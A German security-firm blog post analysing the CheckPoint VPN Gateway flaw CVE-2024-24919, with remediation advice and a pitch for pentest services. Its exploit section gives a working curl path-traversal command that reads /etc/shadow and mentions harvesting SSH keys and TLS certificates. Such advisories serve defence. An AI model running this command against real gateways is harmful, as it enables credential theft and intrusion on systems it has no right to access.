---
title: CheckPoint Schwachstelle mit einem einfachen Kommando ausnutzen
url: https://www.vidrasec.com/de/blog/checkpoint-cve/
description: Wie lässt sich die neue Sicherheitslücke im CheckPoint VPN Gateway (CVE-2024-24919) ausnutzen? Welche Informationen kann ein Angreifer extrahieren?
date: 2024-05-31
---


Diese Woche wurde eine Schwachstelle im CheckPoint VPN Gateway bekannt (CVE-2024-24919). Leider gibt CheckPoint uns nur wenige Informationen über die Auswirkungen der Schwachstelle. Das möchte ich ändern! Ich werde zeigen, wie die Schwachstelle ausgenutzt werden kann und welche Informationen ein Angreifer auslesen kann.

Zuerst das Wichtigste: Um die Schwachstelle zu beheben, muss man:

* Die Schwachstelle patchen.
* Die Passwörter der Accounts im VPN-Gateway ändern.
* Die Passwörter des VPN-Service-Accounts im Active Directory ändern.
* Alle Geheimnisse wie das TLS-Zertifikat oder SSH-Keys ändern.
* Am besten den VPN-Gateway neu aufsetzen.

Eine genaue Beschreibung von CheckPoint findet sich hier: <https://support.checkpoint.com/results/sk/sk182336>

## Ausnutzung und Auswirkung

Ich konnte leider wenig konkrete Informationen finden, welche „potentiell vertraulichen Informationen“ ein Angreifer auslesen „könnte“. Daher habe ich mir das Ganze selbst angeschaut. CheckPoint möchte natürlich nicht zeigen, wie man die Schwachstelle selbst ausnutzen kann. Da dies jedoch bereits im Internet verfügbar ist, werde ich euch zeigen, wie es geht und welche Informationen ein Angreifer tatsächlich auslesen kann.

### Exploit

Das ist einer der einfachsten Exploits, die ich je gesehen habe. Ich habe keine Ahnung, warum das nicht schon länger bekannt war. Folgender `curl`-Befehl nutzt die Schwachstelle aus:

```bash
curl -k $'https://<host>/clients/MyCRL' -X $'POST' --data-binary $'aCSHELL/../../../../../../../etc/shadow'
```

Das ist alles. Als Antwort erhalte ich die `shadow`-Datei zurück, die das Admin-Passwort als salted MD5-Hash enthält.

```plain
admin:$1$XXXX$XXXXXX:00000:0:00000:0:::
[...]
```

Diese Schwachstelle erlaubt mir, alle möglichen Dateien auf dem System als `root` auszulesen, z.B. SSH-Keys oder das TLS-Zertifikat.

### Auswirkung

Wir sehen, die Ausnutzung ist sehr einfach. Ein Angreifer könnte einfach den gesamten IPv4-Bereich durchgehen oder auf [shodan.io](https://shodan.io) nach verwundbaren Systemen suchen.

Ich kann also davon ausgehen, dass diese Schwachstelle ausgenutzt wurde und die Daten auf diesem System nicht mehr vertraulich sind. Also, wie schon oben geschrieben: alles neu machen.

Es handelt sich hier nicht um „potentiell vertrauliche Informationen“, die ein Angreifer auslesen „könnte“. Es sind Daten, die sicher vertraulich sind und wahrscheinlich ausgelesen wurden.

## Was mache ich jetzt?

Als ersten Schritt, wenn noch nicht geschehen, die Anleitung von CheckPoint befolgen und die Schwachstelle beheben.

Für die Zukunft würde ich natürlich gerne empfehlen, dass ihr euch für einen [Externen IT-Infrastruktur-Penetrationstest](/de/services/external-it-infrastructure-penetration-test/) oder ein Audit an VidraSec wendet. Das wird aber leider nicht gegen 0-Day-Schwachstellen helfen.

Wie kann ein Pentest oder ein Audit trotzdem bei solchen Problemen helfen? Nur weil ein System versagt, darf nicht das Gesamtsystem versagen. Ich muss also beispielsweise mein Active Directory dahinter so absichern, dass selbst wenn ein Angreifer den VPN-Gateway übernehmen kann, er keine Domain-Admin-Rechte erlangen kann. Das Ganze wird oft als [Schweizer-Käse-Modell](https://de.wikipedia.org/wiki/Schweizer-K%C3%A4se-Modell) bezeichnet.

[Daher: 🦦 VidraSec kontaktieren und Schwachstellen finden, bevor sie von Angreifern ausgenutzt werden](/de/contact/)

